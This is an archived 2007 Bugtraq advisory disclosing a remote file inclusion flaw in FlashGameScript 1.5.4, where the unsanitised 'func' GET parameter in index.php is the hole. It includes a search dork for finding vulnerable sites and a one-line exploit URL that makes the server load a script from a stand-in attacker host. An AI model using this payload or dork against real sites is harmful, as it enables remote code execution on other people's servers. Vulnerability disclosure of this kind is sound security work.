| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 21 Feb 2007 13:26:59 -0000 From: malic89@...il.com To: bugtraq@...urityfocus.com Subject: FlashGameScript v1.5.4 Remote File Inclusion Vulnerability -------------------------------------------------------- Author : JuMp-Er Date : feb, 21th 2007 Level : Dangerous contact: : aH-crew[at]hotmail[dot]com -------------------------------------------------------- Software description -------------------------------------------------------- App :FlashGameScript Version :1.5.4 URL :http://www.flashgamescript.com/ Dork :Copyright © 2006-2007 Powered by FlashGameScript.com version 1.5 All Rights Reserved Price: :$60 Description : Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be market by folks at FlashGameScript.com. Our game site script is created to maximized arcade site owner’s profit with additional plug-in for alternative income opportunities. ------------------------------------------------------- Vulnerability: --------------- at index.php line 28: $func =$_GET[func]; --------------- Exploit: http://www.target.com/index.php?func=http://attacker.com/evil_script? --------------- Greetz to all members of active. Hacking Crew
Powered by blists - more mailing lists